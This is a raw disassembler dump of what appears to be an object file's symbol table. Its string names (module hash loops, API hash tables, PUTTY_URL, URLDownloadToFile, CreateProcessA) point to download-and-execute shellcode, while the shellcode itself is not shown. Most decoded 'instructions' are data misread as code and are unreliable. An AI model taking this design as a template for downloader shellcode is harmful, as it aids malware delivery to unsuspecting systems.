0x463      add byte ptr [eax], al              \x00\x00                  ..        
0x465      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x46b      add al, byte ptr [eax]              \x02\x00                  ..        
0x46d      push eax                            \x50                      P         
0x46e      inc ecx                             \x41                      A         
0x46f      push esp                            \x54                      T         
0x470      dec eax                             \x48                      H         
0x471      add byte ptr [eax], al              \x00\x00                  ..        
0x473      add byte ptr [eax], al              \x00\x00                  ..        
0x475      align 0x8                          \x00\x00\x00\x00\x00\x00\x00\x00          
0x47d      add al, byte ptr [eax]              \x02\x00                  ..        
0x47f      add byte ptr [eax], al              \x00\x00                  ..        
0x481      db 0x00                             \x00                      .         
0x482      db 0x00                             \x00                      .         
0x483      retf                                \xcb                      .         
0x484      add byte ptr [eax], al              \x00\x00                  ..        
0x486      add byte ptr [eax], al              \x00\x00                  ..        
0x488      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x48f      add al, byte ptr [eax]              \x02\x00                  ..        
0x491      add byte ptr [eax], al              \x00\x00                  ..        
0x493      db 0x00                             \x00                      .         
0x494      db 0x00                             \x00                      .         
0x495      aad 0                               \xd5\x00                  ..        
0x497      add byte ptr [eax], al              \x00\x00                  ..        
0x499      db 0x00                             \x00                      .         
0x49a      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x4a1      add al, byte ptr [eax]              \x02\x00                  ..        
0x4a3      add byte ptr [eax], al              \x00\x00                  ..        
0x4a5      db 0x00                             \x00                      .         
0x4a6      db 0x00                             \x00                      .         
0x4a7      out 0, eax                          \xe7\x00                  ..        
0x4a9      add byte ptr [eax], al              \x00\x00                  ..        
0x4ab      db 0x00                             \x00                      .         
0x4ac      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x4b3      add al, byte ptr [eax]              \x02\x00                  ..        
0x4b5      add byte ptr [eax], al              \x00\x00                  ..        
0x4b7      db 0x00                             \x00                      .         
0x4b8      db 0x00                             \x00                      .         
0x4b9      inc byte ptr [eax]                  \xfe\x00                  ..        
0x4bb      add byte ptr [eax], al              \x00\x00                  ..        
0x4bd      db 0x00                             \x00                      .         
0x4be      align 0x7                          \x00\x00\x00\x00\x00\x00\x00          
0x4c5      add al, byte ptr [eax]              \x02\x00                  ..        
0x4c7      add byte ptr [eax], al              \x00\x00                  ..        
0x4c9      db 0x00                             \x00                      .         
0x4ca      db 0x00                             \x00                      .         
0x4cb      push ss                             \x16                      .         
0x4cc      add dword ptr [eax], eax            \x01\x00                  ..        
0x4ce      add byte ptr [eax], al              \x00\x00                  ..        
0x4d0      db 0x00                             \x00                      .         
0x4d1      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x4d7      add al, byte ptr [eax]              \x02\x00                  ..        
0x4d9      add byte ptr [eax], al              \x00\x00                  ..        
0x4db      db 0x00                             \x00                      .         
0x4dc      db 0x00                             \x00                      .         
0x4dd      sub eax, dword ptr [ecx]            \x2b\x01                  +.        
0x4df      add byte ptr [eax], al              \x00\x00                  ..        
0x4e1      add byte ptr [eax], al              \x00\x00                  ..        
0x4e3      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x4e9      add al, byte ptr [eax]              \x02\x00                  ..        
0x4eb      add byte ptr [eax], al              \x00\x00                  ..        
0x4ed      db 0x00                             \x00                      .         
0x4ee      db 0x00                             \x00                      .         
0x4ef      cmp eax, dword ptr [ecx]            \x3b\x01                  ;.        
0x4f1      add byte ptr [eax], al              \x00\x00                  ..        
0x4f3      add byte ptr [eax], al              \x00\x00                  ..        
0x4f5      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x4fb      add al, byte ptr [eax]              \x02\x00                  ..        
0x4fd      add byte ptr [eax], al              \x00\x00                  ..        
0x4ff      db 0x00                             \x00                      .         
0x500      db 0x00                             \x00                      .         
0x501      push eax                            \x50                      P         
0x502      add dword ptr [eax], eax            \x01\x00                  ..        
0x504      add byte ptr [eax], al              \x00\x00                  ..        
0x506      db 0x00                             \x00                      .         
0x507      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x50d      add al, byte ptr [eax]              \x02\x00                  ..        
0x50f      add byte ptr [eax], al              \x00\x00                  ..        
0x511      db 0x00                             \x00                      .         
0x512      db 0x00                             \x00                      .         
0x513      imul eax, dword ptr [ecx], 0        \x69\x01\x00\x00\x00\x00  i.....    
0x519      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x51f      db 0x02 (!)                        \x02                      .         
0x520      db 0x00 (!)                        \x00                      .         
0x521      db 0x00 (!)                        \x00                      .         
0x522      db 0x00 (!)                        \x00                      .         
0x523      db 0x00 (!)                        \x00                      .         
*B0x524      db 0x00 (!)                        \x00                      .         
0x524      align 0x1                          \x00                                
0x525      db 0x7d (!)                        \x7d                      }         
0x526      db 0x01 (!)                        \x01                      .         
0x527      db 0x00 (!)                        \x00                      .         
	 label_0x528:
0x528      db 0x00 (!)                        \x00                      .         
0x529      db 0x00 (!)                        \x00                      .         
0x52a      db 0x00 (!)                        \x00                      .         
*B0x52b      db 0x00 (!)                        \x00                      .         
0x52b      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x531      add al, byte ptr [eax]              \x02\x00                  ..        
0x533      add byte ptr [eax], al              \x00\x00                  ..        
0x535      db 0x00                             \x00                      .         
0x536      db 0x00                             \x00                      .         
0x537      mov dword ptr [ecx], eax            \x89\x01                  ..        
0x539      add byte ptr [eax], al              \x00\x00                  ..        
0x53b      add byte ptr [eax], al              \x00\x00                  ..        
0x53d      align 0x6                          \x00\x00\x00\x00\x00\x00            
0x543      add al, byte ptr [eax]              \x02\x00                  ..        
0x545      inc eax                             \x40                      @         
0x546      feat.00 ; string                   \x66\x65\x61\x74\x2e\x30\x30          
0x54d      add dword ptr [eax], eax            \x01\x00                  ..        
0x54f      add byte ptr [eax], al              \x00\x00                  ..        
0x551      db 0xff                             \xff                      .         
0x552      inc dword ptr [eax]                 \xff\x00                  ..        
0x554      add byte ptr [ebx], al              \x00\x03                  ..        
0x556      db 0x00                             \x00                      .         
0x557      xchg eax, ebp                       \x95                      .         
0x558      add dword ptr [eax], eax            \x01\x00                  ..        
0x55a      db 0x00                             \x00                      .         
0x55b      mainentrypoint ; string            \x6d\x61\x69\x6e\x65\x6e\x74\x72\x79\x70\x6f\x69\x6e\x74          
0x569      db 0x00                             \x00                      .         
	 label_0x579:
0x56a      get_module_address ; string        \x67\x65\x74\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x61\x64\x64\x72\x65\x73\x73          
0x57c      db 0x00                             \x00                      .         
0x57d      next_module_loop ; string          \x6e\x65\x78\x74\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x6c\x6f\x6f\x70          
0x58d      db 0x00                             \x00                      .         
	 label_0x58e:
0x58e      module_hash_loop ; string          \x6d\x6f\x64\x75\x6c\x65\x5f\x68\x61\x73\x68\x5f\x6c\x6f\x6f\x70          
0x59e      db 0x00                             \x00                      .         
	 label_0x59f:
0x59f      end_hash_check ; string            \x65\x6e\x64\x5f\x68\x61\x73\x68\x5f\x63\x68\x65\x63\x6b          
0x5ad      db 0x00                             \x00                      .         
0x5ae      end_module_hash_loop ; string      \x65\x6e\x64\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x68\x61\x73\x68\x5f\x6c\x6f\x6f\x70          
0x5c2      db 0x00                             \x00                      .         
	 label_0x5c3:
0x5c3      get_api_address ; string           \x67\x65\x74\x5f\x61\x70\x69\x5f\x61\x64\x64\x72\x65\x73\x73          
0x5d2      db 0x00                             \x00                      .         
	 label_0x5df:
	 label_0x5d5:
0x5d3      load_api_hash ; string             \x6c\x6f\x61\x64\x5f\x61\x70\x69\x5f\x68\x61\x73\x68          
0x5e0      db 0x00                             \x00                      .         
0x5e1      load_api_name ; string             \x6c\x6f\x61\x64\x5f\x61\x70\x69\x5f\x6e\x61\x6d\x65          
0x5ee      db 0x00                             \x00                      .         
	 label_0x5f5:
	 label_0x5f3:
	 label_0x5ef:
0x5ef      create_hash_loop ; string          \x63\x72\x65\x61\x74\x65\x5f\x68\x61\x73\x68\x5f\x6c\x6f\x6f\x70          
	 label_0x5ff:
0x5ff      db 0x00                             \x00                      .         
	 label_0x600:
0x600      callpop_1 ; string                 \x63\x61\x6c\x6c\x70\x6f\x70\x5f\x31          
0x609      db 0x00                             \x00                      .         
0x60a      load_api_addy ; string             \x6c\x6f\x61\x64\x5f\x61\x70\x69\x5f\x61\x64\x64\x79          
0x617      db 0x00                             \x00                      .         
	 label_0x618:
0x618      callpop_2 ; string                 \x63\x61\x6c\x6c\x70\x6f\x70\x5f\x32          
0x621      db 0x00                             \x00                      .         
	 label_0x626:
	 label_0x623:
0x622      PUTTY_URL ; string                 \x50\x55\x54\x54\x59\x5f\x55\x52\x4c          
0x62b      db 0x00                             \x00                      .         
	 label_0x635:
	 label_0x633:
0x62c      KERNEL32HASHTABLE ; string         \x4b\x45\x52\x4e\x45\x4c\x33\x32\x48\x41\x53\x48\x54\x41\x42\x4c\x45          
0x63d      db 0x00                             \x00                      .         
	 label_0x652:
	 label_0x645:
	 label_0x644:
0x63e      KERNEL32FUNCTIONSTABLE ; string    \x4b\x45\x52\x4e\x45\x4c\x33\x32\x46\x55\x4e\x43\x54\x49\x4f\x4e\x53\x54\x41\x42\x4c\x45          
0x654      db 0x00                             \x00                      .         
	 label_0x667:
	 label_0x65a:
0x655      KERNEL32_CREATEPROCESSA ; string   \x4b\x45\x52\x4e\x45\x4c\x33\x32\x5f\x43\x52\x45\x41\x54\x45\x50\x52\x4f\x43\x45\x53\x53\x41          
0x66c      db 0x00                             \x00                      .         
	 label_0x67f:
	 label_0x67b:
	 label_0x675:
0x66d      KERNEL32_LOADLIBRARY ; string      \x4b\x45\x52\x4e\x45\x4c\x33\x32\x5f\x4c\x4f\x41\x44\x4c\x49\x42\x52\x41\x52\x59          
0x681      db 0x00                             \x00                      .         
	 label_0x68d:
0x682      URLMONHASHTABLE ; string           \x55\x52\x4c\x4d\x4f\x4e\x48\x41\x53\x48\x54\x41\x42\x4c\x45          
0x691      db 0x00                             \x00                      .         
0x692      URLMONFUNCTIONSTABLE ; string      \x55\x52\x4c\x4d\x4f\x4e\x46\x55\x4e\x43\x54\x49\x4f\x4e\x53\x54\x41\x42\x4c\x45          
0x6a6      db 0x00                             \x00                      .         
0x6a7      URLMON_URLDOWNLOADTOFILE ; string  \x55\x52\x4c\x4d\x4f\x4e\x5f\x55\x52\x4c\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x54\x4f\x46\x49\x4c\x45          
0x6bf      db 0x00                             \x00                      .         
0x6c0      PROCESS_INFORMATION ; string       \x50\x52\x4f\x43\x45\x53\x53\x5f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e          
0x6d3      db 0x00                             \x00                      .         
0x6d4      STARTUPINFO ; string               \x53\x54\x41\x52\x54\x55\x50\x49\x4e\x46\x4f          
0x6df      db 0x00                             \x00                      .         
0x6e0      ExitProcess ; string               \x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73          
*C0x6eb      db 0x00 (!)                        \x00                      .         
